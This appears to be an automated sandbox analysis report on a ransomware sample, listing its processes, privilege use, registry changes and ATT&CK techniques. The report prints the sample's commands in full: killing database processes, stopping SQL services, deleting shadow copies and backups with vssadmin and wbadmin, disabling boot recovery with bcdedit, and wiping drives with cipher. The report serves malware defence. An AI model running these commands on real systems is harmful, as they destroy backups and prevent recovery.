2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2524	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	2828	taskkill.exe
Token: SeDebugPrivilege	1764	taskkill.exe
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	1488	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	2796	taskkill.exe
Token: SeDebugPrivilege	1356	taskkill.exe
Token: SeDebugPrivilege	1028	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2468	WMIC.exe
Token: SeSecurityPrivilege	2468	WMIC.exe
Token: SeTakeOwnershipPrivilege	2468	WMIC.exe
Token: SeLoadDriverPrivilege	2468	WMIC.exe
Token: SeSystemProfilePrivilege	2468	WMIC.exe
Token: SeSystemtimePrivilege	2468	WMIC.exe
Token: SeProfSingleProcessPrivilege	2468	WMIC.exe
Token: SeIncBasePriorityPrivilege	2468	WMIC.exe
Token: SeCreatePagefilePrivilege	2468	WMIC.exe
Token: SeBackupPrivilege	2468	WMIC.exe
Token: SeRestorePrivilege	2468	WMIC.exe
Token: SeShutdownPrivilege	2468	WMIC.exe
Token: SeDebugPrivilege	2468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2468	WMIC.exe
Token: SeRemoteShutdownPrivilege	2468	WMIC.exe
Token: SeUndockPrivilege	2468	WMIC.exe
Token: SeManageVolumePrivilege	2468	WMIC.exe
Token: 33	2468	WMIC.exe
Token: 34	2468	WMIC.exe
Token: 35	2468	WMIC.exe
Token: SeBackupPrivilege	1500	vssvc.exe
Token: SeRestorePrivilege	1500	vssvc.exe
Token: SeAuditPrivilege	1500	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2256 wrote to memory of 2544	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2544	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2544	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2544	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2544 wrote to memory of 2620	2544	cmd.exe	cmd.exe
PID 2544 wrote to memory of 2620	2544	cmd.exe	cmd.exe
PID 2544 wrote to memory of 2620	2544	cmd.exe	cmd.exe
PID 2544 wrote to memory of 2620	2544	cmd.exe	cmd.exe
PID 2256 wrote to memory of 2632	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2632	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2632	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2632	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2632 wrote to memory of 2500	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2500	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2500	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2500	2632	cmd.exe	cmd.exe
PID 2500 wrote to memory of 2524	2500	cmd.exe	taskkill.exe
PID 2500 wrote to memory of 2524	2500	cmd.exe	taskkill.exe
PID 2500 wrote to memory of 2524	2500	cmd.exe	taskkill.exe
PID 2256 wrote to memory of 2072	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2072	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2072	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2072	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2072 wrote to memory of 2708	2072	cmd.exe	cmd.exe
PID 2072 wrote to memory of 2708	2072	cmd.exe	cmd.exe
PID 2072 wrote to memory of 2708	2072	cmd.exe	cmd.exe
PID 2072 wrote to memory of 2708	2072	cmd.exe	cmd.exe
PID 2708 wrote to memory of 2172	2708	cmd.exe	taskkill.exe
PID 2708 wrote to memory of 2172	2708	cmd.exe	taskkill.exe
PID 2708 wrote to memory of 2172	2708	cmd.exe	taskkill.exe
PID 2256 wrote to memory of 2560	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2560	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2560	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2560	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2560 wrote to memory of 2508	2560	cmd.exe	cmd.exe
PID 2560 wrote to memory of 2508	2560	cmd.exe	cmd.exe
PID 2560 wrote to memory of 2508	2560	cmd.exe	cmd.exe
PID 2560 wrote to memory of 2508	2560	cmd.exe	cmd.exe
PID 2508 wrote to memory of 2392	2508	cmd.exe	taskkill.exe
PID 2508 wrote to memory of 2392	2508	cmd.exe	taskkill.exe
PID 2508 wrote to memory of 2392	2508	cmd.exe	taskkill.exe
PID 2256 wrote to memory of 2444	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2444	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2444	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2444	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2444 wrote to memory of 2452	2444	cmd.exe	cmd.exe
PID 2444 wrote to memory of 2452	2444	cmd.exe	cmd.exe
PID 2444 wrote to memory of 2452	2444	cmd.exe	cmd.exe
PID 2444 wrote to memory of 2452	2444	cmd.exe	cmd.exe
PID 2452 wrote to memory of 2828	2452	cmd.exe	taskkill.exe
PID 2452 wrote to memory of 2828	2452	cmd.exe	taskkill.exe
PID 2452 wrote to memory of 2828	2452	cmd.exe	taskkill.exe
PID 2256 wrote to memory of 2832	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2832	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2832	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2256 wrote to memory of 2832	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe
PID 2832 wrote to memory of 552	2832	cmd.exe	cmd.exe
PID 2832 wrote to memory of 552	2832	cmd.exe	cmd.exe
PID 2832 wrote to memory of 552	2832	cmd.exe	cmd.exe
PID 2832 wrote to memory of 552	2832	cmd.exe	cmd.exe
PID 552 wrote to memory of 1764	552	cmd.exe	taskkill.exe
PID 552 wrote to memory of 1764	552	cmd.exe	taskkill.exe
PID 552 wrote to memory of 1764	552	cmd.exe	taskkill.exe
PID 2256 wrote to memory of 800	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	cmd.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1192
- C:\Users\Admin\AppData\Local\Temp\96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
  "C:\Users\Admin\AppData\Local\Temp\96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2256
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
      4⤵
      PID:2620
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2500
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlbrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2524
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sql writer.exe
        5⤵
        Kills process with taskkill
        
        PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2508
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlserv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2452
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msmdsrv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2828
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:552
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im MsDtsSrvr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1764
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    PID:800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      4⤵
      PID:1840
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlceip.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1844
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    PID:2704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      4⤵
      PID:1752
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdlauncher.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    PID:308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      4⤵
      PID:2292
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im Ssms.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    PID:540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      4⤵
      PID:544
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im SQLAGENT.EXE
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:576
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    PID:2432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      4⤵
      PID:1248
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdhost.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2796
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    PID:1652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      4⤵
      PID:332
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im ReportingServicesService.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1356
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    PID:1296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      4⤵
      PID:720
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msftesql.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    PID:2764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      4⤵
      PID:1224
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im pg_ctl.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    PID:1572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      4⤵
      PID:1612
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -impostgres.exe
        5⤵
        Kills process with taskkill
        
        PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    PID:1756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      4⤵
      PID:2344
    - - C:\Windows\system32\net.exe
        
        net stop MSSQLServerADHelper100
        5⤵
        
        PID:404
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        6⤵
        
        PID:1000
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    PID:2992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
      4⤵
      PID:1960
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$ISARS
        5⤵
        
        PID:448
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ISARS
        6⤵
        
        PID:1088
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    PID:1620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
      4⤵
      PID:3044
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$MSFW
        5⤵
        
        PID:844
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        6⤵
        
        PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    PID:1924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      4⤵
      PID:1476
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$ISARS
        5⤵
        
        PID:1908
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        6⤵
        
        PID:328
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    PID:1280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      4⤵
      PID:696
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$MSFW
        5⤵
        
        PID:2752
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        6⤵
        
        PID:344
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    PID:1916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
      4⤵
      PID:960
    - - C:\Windows\system32\net.exe
        
        net stop SQLBrowser
        5⤵
        
        PID:2480
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        6⤵
        
        PID:3024
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    PID:472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
      4⤵
      PID:1900
    - - C:\Windows\system32\net.exe
        
        net stop REportServer$ISARS
        5⤵
        
        PID:1480
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop REportServer$ISARS
        6⤵
        
        PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    PID:2092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
      4⤵
      PID:1964
    - - C:\Windows\system32\net.exe
        
        net stop SQLWriter
        5⤵
        
        PID:2136
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        6⤵
        
        PID:820
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    PID:2008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      PID:2964
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:2452
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    PID:2780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
      4⤵
      PID:2952
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete backup -keepVersion:0 -quiet
        5⤵
        Deletes system backups
        Drops file in Windows directory
        
        PID:896
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:1364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      PID:2968
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTATEBACKUP
        5⤵
        Deletes System State backups
        
        PID:2600
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    PID:1888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      4⤵
      PID:2628
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        5⤵
        
        PID:2440
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    PID:1860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:2120
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe SHADOWCOPY /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2468
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    PID:2028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      4⤵
      PID:1720
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} recoverynabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:1496
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2544
- - C:\Windows\SysWOW64\cipher.exe
    cipher /w:\\?\C:
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\cipher.exe
    cipher /w:\\?\A:
    3⤵
    - Enumerates connected drives
    PID:1420
- - C:\Windows\SysWOW64\cipher.exe
    cipher /w:\\?\F:
    3⤵
    - Enumerates connected drives
    PID:1932
- C:\Users\Admin\AppData\Local\Temp\96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe -network
  2⤵
  - System policy modification
  PID:900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    PID:780

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\How_to_back_files.html

Filesize
5KB

MD5
65f51150025fa68a4bff11be59e9b5f6

SHA1
3794422a46157099fd8559d4c9091722a26d79a4

SHA256
4ffea8a11f46fa99d6af944d71901c00c18afb408a8c43886e0519cd1db1d7a6

SHA512
ce50997ed5bee18d41a7aa62a8387e456f3639c59ff6fd76f9f7bf40f96bb7b3e41fd7695251eca50a6de64356c9a0bb1d047060b367dc65ec5068930701e4f3

Download Submit
